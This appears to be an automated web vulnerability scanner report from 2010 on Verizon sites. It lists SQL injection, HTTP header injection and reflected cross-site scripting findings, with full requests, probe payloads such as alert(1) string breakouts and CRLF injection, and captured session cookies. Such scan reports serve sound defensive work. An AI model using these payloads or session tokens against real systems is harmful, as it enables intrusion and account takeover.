3.289. https://www22.verizon.com/Residential/TV/ [VzApps cookie]

3.290. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]

3.291. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie]

3.292. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [dotcomsid cookie]

3.293. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]

3.294. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]

3.295. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [dotcomsid cookie]

3.296. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]

3.297. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]

3.298. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [dotcomsid cookie]

3.299. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]

3.300. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]

3.301. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [dotcomsid cookie]

3.302. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx [vzapps cookie]

3.303. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [ECSPCookies cookie]

3.304. https://www22.verizon.com/foryourhome/fttprepair/nr/common/MainMenu.aspx [VzApps cookie]

4. SSL cookie without secure flag set

4.1. https://www36.verizon.com/fiostv/web/Signin.aspx

4.2. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

4.3. https://www36.verizon.com/fiosvoice/

5. Cookie without HttpOnly flag set

5.1. http://www2.verizon.net/help/dsl_settings/

5.2. http://www2.verizon.net/micro/speedtest/hsi/

5.3. http://www35.vzw.com/HG

5.4. https://www36.verizon.com/fiostv/web/Signin.aspx

5.5. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

6. Password field with autocomplete enabled

7. Cross-domain Referer leakage

7.1. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

7.2. http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.aspx

7.3. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

8. Cross-domain script include

8.1. http://www22.verizon.com/Residential/HighSpeedInternet/

8.2. http://www22.verizon.com/Residential/HighSpeedInternet/Overview/

8.3. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm

8.4. http://www22.verizon.com/Residential/aboutFiOS/

9. Email addresses disclosed

10. Cacheable HTTPS response

10.1. https://www36.verizon.com/fiostv/web/unprotected/showtime.aspx

10.2. https://www36.verizon.com/fiosvoice/terms/Terms_of_Service.pdf

10.3. https://www36.verizon.com/fiosvoice/userguide/User_Guide.pdf

11. HTML does not specify charset

11.1. http://www2.verizon.net/help/dsl_settings/

11.2. http://www35.vzw.com/HG

12. Content type is not specified

12.1. http://www36.verizon.com/fiostv

12.2. https://www36.verizon.com/fiostv



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://activate.verizon.net
Path:   /vasonly/AboutYourself.do

Issue detail

The gender parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gender parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

POST /vasonly/AboutYourself.do;EPIFREESESSIONID=r12cMnqcBQ56FnnVPC4dLj14FwxV2V7JnX2pT7DGKc3rPKHcmylG!757931108!-644176158 HTTP/1.1
Host: activate.verizon.net
Connection: keep-alive
Referer: https://activate.verizon.net/vasonly/start?type=consumer
Cache-Control: max-age=0
Origin: https://activate.verizon.net
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2Fshop%2FshopRedirect.aspx%3Foid%3DVX765; ActualProtectedResource=http://surround.verizon.net/shop/shopRedirect.aspx?oid=VX765; EPIFREESESSIONID=r12cMnqcBQ56FnnVPC4dLj14FwxV2V7JnX2pT7DGKc3rPKHcmylG!757931108!-644176158
Content-Length: 202

custType=consumer&firstName=%27&middleName=%27&lastName=%27%27&gender=male'&btn1=666&btn2=666&btn3=6666&address1=%27&address2=++&address3=%27&city=%27&state=AK&zipcode=10010&faxNumber=&buttonpressed=next

Response 1

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 02:17:05 GMT
Server: Apache
Content-Length: 1568
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<HEAD>


<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<META name="GENERATOR" content="IBM WebSp
...[SNIP]...
<form name="errors_form" id="vzform" method="post" action="/vasonly/Error.do">
...[SNIP]...

Request 2

POST /vasonly/AboutYourself.do;EPIFREESESSIONID=r12cMnqcBQ56FnnVPC4dLj14FwxV2V7JnX2pT7DGKc3rPKHcmylG!757931108!-644176158 HTTP/1.1
Host: activate.verizon.net
Connection: keep-alive
Referer: https://activate.verizon.net/vasonly/start?type=consumer
Cache-Control: max-age=0
Origin: https://activate.verizon.net
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2Fshop%2FshopRedirect.aspx%3Foid%3DVX765; ActualProtectedResource=http://surround.verizon.net/shop/shopRedirect.aspx?oid=VX765; EPIFREESESSIONID=r12cMnqcBQ56FnnVPC4dLj14FwxV2V7JnX2pT7DGKc3rPKHcmylG!757931108!-644176158
Content-Length: 202

custType=consumer&firstName=%27&middleName=%27&lastName=%27%27&gender=male''&btn1=666&btn2=666&btn3=6666&address1=%27&address2=++&address3=%27&city=%27&state=AK&zipcode=10010&faxNumber=&buttonpressed=next

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Sat, 20 Nov 2010 02:17:06 GMT
Server: Apache
Location: https://activate.verizon.net/vasonly/Tell_us_about_yourself.jsp
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 321

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://activate.verizon.net/vason
...[SNIP]...

2. HTTP header injection  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into the Location response header. The payload 468b3%0d%0ae6a869cb573 was submitted in the goto parameter. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAW&clientId=myvz&goto=468b3%0d%0ae6a869cb573 HTTP/1.1
Host: auth.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 20 Nov 2010 02:15:45 GMT
Content-length: 0
Content-type: text/html
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-control: private
Pragma: no-cache
X-dsameversion: 7 2005Q4 patch5 (Tue Feb 27 17:18:03 2007) SunOS
Am_client_type: genericHTML
Location: https://www22.verizon.com/myverizon/?session=n&goto=468b3
e6a869cb573

Set-cookie: JSESSIONID=551CF2532820EFDFFF319A43015D9990;Path=/
Set-cookie: AMAuthCookie=AQIC5wM2LY4SfcyLSw2AprZCxoQFFnJupN9A%2FsDZ3JgYIpY%3D%40AAJTSQACNjkAAlMxAAIwMw%3D%3D%23;Domain=.verizon.com;Path=/
Set-cookie: amlbcookie=03;Domain=.verizon.com;Path=/
Set-cookie: AMAuthCookie=LOGOUT;Domain=.verizon.com;Expires=Thu, 01-Jan-1970 00:00:10 GMT;Path=/
Connection: close


3. Cross-site scripting (reflected)  previous  next
There are 304 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. https://auth.verizon.com/amserver/UI/Login [goto parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8af9a"%3b4024f132588 was submitted in the goto parameter. This input was echoed as 8af9a";4024f132588 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAW&clientId=myvz&goto=https%3A%2F%2Fwww22.verizon.com%3A443%2FForYourHome%2FMyAccount%2FProtected%2FServices%2FMyServices.aspx8af9a"%3b4024f132588 HTTP/1.1
Host: auth.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:21 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=EHCLJDFBFEEGFCIFCBIGJOAL; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:20:21 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129007

<!-- Vignette V6 Fri Nov 19 18:15:20 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
   window.location.href="http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx8af9a";4024f132588";
}

function fnSetSessionCookie(name,value,path,domain){
   document.cookie=name+"="+escape(value)+((path)?";path="+path:"")+((domain)?";domain="+domain:"");
}
var strRemOpt="";
var strMyVzCom=f
...[SNIP]...

3.2. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 923dc(a)cae14d5df3e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal923dc(a)cae14d5df3e/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview HTTP/1.1
Host: business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 02:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:24:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=W9dBMnxLblXyp1zMxmh9xXJ5sJ1GhL2yjvRdnpn3RyX2zx0WJDnJ!-1644393018; path=/

Resource /SMBPortal923dc(a)cae14d5df3e/smb could not be resolved for locale null.

3.3. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c0137(a)ec58675ea9d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smbc0137(a)ec58675ea9d?_nfpb=true&_pageLabel=SMBPortal_page_main_overview HTTP/1.1
Host: business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 02:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:24:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=p9nBMnxLqJjc3gBG3N24ptCcfRyVf0J3mPQ12GZLG8XXhFcry8CR!-486484779; path=/

Resource /SMBPortal/smbc0137(a)ec58675ea9d could not be resolved for locale null.

3.4. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68173'-alert(1)-'ec88b63ed46 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview68173'-alert(1)-'ec88b63ed46 HTTP/1.1
Host: business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 02:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:24:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=2rdQMnxHQgCxhM1gq2pGyQJ8zfDdQyG9qXsqLLdVZtv4TTjqCpGk!1459926814; path=/
Content-Length: 112563

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
hHeaderText");
           
       if(searchFlow != null && searchFlow == "Shop")
           searchBox = document.getElementById("searchShopHeaderText");    
       
       var f_pageDefLabel = 'SMBPortal_page_main_overview68173'-alert(1)-'ec88b63ed46';
       if (f_pageDefLabel != "SMBPortal_page_SignIn")
           searchBox.focus();
   }
   
   onload = focusIt;
   // end WR 61703
   
</script>
...[SNIP]...

3.5. https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketMainDispatch.do [serviceId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://enterprisecenter.verizon.com
Path:   /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do

Issue detail

The value of the serviceId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ea0c'%3balert(1)//5fb68b88c27 was submitted in the serviceId parameter. This input was echoed as 1ea0c';alert(1)//5fb68b88c27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /enterprisesolutions/default/irepair/QuickTicketMainDispatch.do?route=evaluateServiceId HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
Cache-Control: max-age=0
Origin: https://enterprisecenter.verizon.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; ED_SESSIONID=KxTbMnyP2zr9LhVwBk93rzd6dKK0TBqL2ZNYgJg4qC0TFgJwDMP5!2085112158!-2093491878; pref_lang=en-US; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; BusinessUnit=business
